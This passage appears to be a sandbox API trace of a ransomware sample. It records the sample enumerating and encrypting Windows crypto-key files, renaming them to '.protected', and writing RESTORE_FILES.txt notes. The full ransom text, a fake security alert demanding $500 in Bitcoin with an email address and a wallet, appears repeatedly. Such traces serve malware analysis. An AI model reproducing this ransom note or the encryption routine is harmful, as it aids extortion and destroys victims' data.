dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xd4 [0065.527] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.527] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0065.527] lstrlenA (lpString="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") returned 684 [0065.527] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0065.528] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.528] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0065.528] CloseHandle (hObject=0xd4) returned 1 [0065.528] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.528] lstrcmpiW (lpString1="S-1-5-18", lpString2="Windows") returned -1 [0065.528] lstrcmpiW (lpString1="S-1-5-18", lpString2="Program Files") returned 1 [0065.528] lstrcmpiW (lpString1="S-1-5-18", lpString2="Program Files (x86)") returned 1 [0065.528] lstrcmpiW (lpString1="S-1-5-18", lpString2="$Recycle.bin") returned 1 [0065.528] lstrcmpiW (lpString1="S-1-5-18", lpString2="System Volume Information") returned -1 [0065.528] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned 48 [0065.528] lstrcmpW (lpString1="S-1-5-18", lpString2=".") returned 1 [0065.528] lstrcmpW (lpString1="S-1-5-18", lpString2="..") returned 1 [0065.528] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*") returned 50 [0065.528] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0065.533] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.533] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.533] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 
[0065.533] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.533] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.533] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\.") returned 50 [0065.533] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.533] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0065.533] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0065.533] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.533] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.533] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\." (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.533] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.533] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.533] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.533] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.533] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.534] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.534] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\..") returned 51 [0065.534] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.534] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0065.534] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0065.534] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0065.534] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.534] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\.." (normalized: "c:\\programdata\\microsoft\\crypto\\rsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.534] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.534] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Windows") returned -1 [0065.534] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files") returned -1 [0065.534] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files (x86)") returned -1 [0065.534] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="$Recycle.bin") returned 1 [0065.534] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="System Volume Information") returned -1 [0065.534] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.534] StrStrIW (lpFirst="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".protected") 
returned 0x0 [0065.534] lstrcmpW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="RESTORE_FILES.txt") returned -1 [0065.534] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.534] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0065.534] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.534] StrStrW (lpFirst="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0065.534] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.534] StrStrW (lpFirst="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".rar") returned 0x0 [0065.534] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.534] StrStrW (lpFirst="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".zip") returned 0x0 [0065.534] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: 
lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2f, lpOverlapped=0x0) returned 1 [0065.535] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffffd1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.535] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2f, lpOverlapped=0x0) returned 1 [0065.536] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.536] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0065.536] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0065.536] CloseHandle (hObject=0xd8) returned 1 [0065.536] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected") returned 128 [0065.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected" (normalized: 
"c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected")) returned 1 [0065.539] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.539] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Windows") returned -1 [0065.539] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files") returned -1 [0065.539] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files (x86)") returned -1 [0065.539] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="$Recycle.bin") returned 1 [0065.539] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="System Volume Information") returned -1 [0065.539] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.539] StrStrIW (lpFirst="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".protected") returned 0x0 [0065.539] lstrcmpW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="RESTORE_FILES.txt") returned -1 [0065.539] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.539] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.539] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" 
(normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0065.539] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.539] StrStrW (lpFirst="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0065.539] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.539] StrStrW (lpFirst="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".rar") returned 0x0 [0065.539] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.539] StrStrW (lpFirst="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".zip") returned 0x0 [0065.539] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x41d, lpOverlapped=0x0) returned 1 [0065.570] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xfffffbe3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.570] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x41d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x41d, lpOverlapped=0x0) returned 1 [0065.571] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.571] 
WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0065.571] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0065.572] CloseHandle (hObject=0xd8) returned 1 [0065.572] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected") returned 128 [0065.572] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected")) returned 1 [0065.573] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0065.573] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0065.573] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\RESTORE_FILES.txt") returned 66 [0065.573] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0065.576] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.576] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0065.577] lstrlenA (lpString="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") returned 684 [0065.577] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0065.577] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.577] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0065.577] CloseHandle (hObject=0xd4) returned 1 [0065.578] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0065.578] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0065.578] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt") returned 57 [0065.578] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0065.578] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.578] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0065.579] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.579] WriteFile (in: hFile=0xb4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0065.579] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.579] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0065.579] CloseHandle (hObject=0xb4) returned 1 [0065.579] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0065.582] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0065.582] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RESTORE_FILES.txt") returned 53 [0065.582] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0065.922] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an 